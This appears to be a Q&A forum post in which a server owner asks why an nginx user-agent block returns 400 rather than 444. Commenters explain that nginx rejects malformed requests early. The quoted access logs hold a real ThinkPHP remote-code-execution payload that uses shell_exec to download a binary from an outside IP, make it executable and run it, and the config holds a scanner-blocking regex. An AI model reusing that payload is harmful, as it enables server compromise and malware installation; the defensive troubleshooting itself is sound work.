# How to Block Remote Code Execution Vulnerability Nginx?

Tags: security, nginx, bots

I receive strange requests to my nginx that try to execute php code even though I don't have php installed.

I use docker compose to run my application that is composed of 5 pieces:

- dm-gateway - nginx:1.19.2 as reverse proxy
- keymetrics/pm2:12-alpine to run angular
- openjdk:8-jdk-alpine to run java application
- mysql:8.0
- certbot

I have configured nginx to return **444** when header **Uirusu** is present.

```
if ($http_user_agent ~* "puzzles|Uirusu|zgrab|ZmEu") {
      return 444;
}
```

When I call the base url from postman or from curl the rule works as expected. I see the following log with  status code **444**:

```
dm-gateway *.*.114.126 - - [10/Oct/2020:10:32:04 +0000] "GET / HTTP/1.1" 444 0 "-" "Uirusu/2.0"
```

Recently after having analyzed my logs I still noticed the presence of status code **400** when **some one** calls me with user agent **Uirusu**.

```
dm-gateway | 197.44.170.84 - - [10/Oct/2020:10:52:18 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://89.248.168.215/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 150 "-" "Uirusu/2.0"
```

I even tried to execute the same url myself to verify it and it gets blocked as expected. In fact it returns **444** correctly.

```
dm-gateway | 2.233.114.126 - - [10/Oct/2020:11:05:33 +0000] "GET /index.php?s=/index/%5Cx09hink%5Cx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=%27wget%20http://89.248.168.215/bins/x86%20-O%20thonkphp%20;%20chmod%20777%20thonkphp%20;%20./thonkphp%20ThinkPHP%20;%20rm%20-rf%20thinkphp%27 HTTP/1.1" 444 0 "-" "Uirusu/2.0"
```

I also noticed the difference in log between calls done by me and by someone else. My calls appear 'url encoded'.

I checked ports as well with `netstat -lntp`

```
root@dm:/var/app# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      513/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      583/sshd: /usr/sbin 
tcp6       0      0 :::443                  :::*                    LISTEN      357727/docker-proxy 
tcp6       0      0 :::3306                 :::*                    LISTEN      357778/docker-proxy 
tcp6       0      0 :::80                   :::*                    LISTEN      357766/docker-proxy 
tcp6       0      0 :::22                   :::*                    LISTEN      583/sshd: /usr/sbin
```

I'm kinda blocked here. I can't understand why calls made by me get blocked correctly and by someone else not?

Comment: Well, your Nginx has to process the request before it can return a 444 status. 400 means "bad request", so it's been rejected **before** Nginx decides to process it.

Comment: but which application rejected it? I use Ubuntu 20.04 LTS, But since I see 400 in nginx log, it seems that the call arrived to nginx and bad request was returned instead of 444

Comment: Nginx received the request and decided it was invalid so decided to reject it **before** attempting to match it against one of your `server` blocks.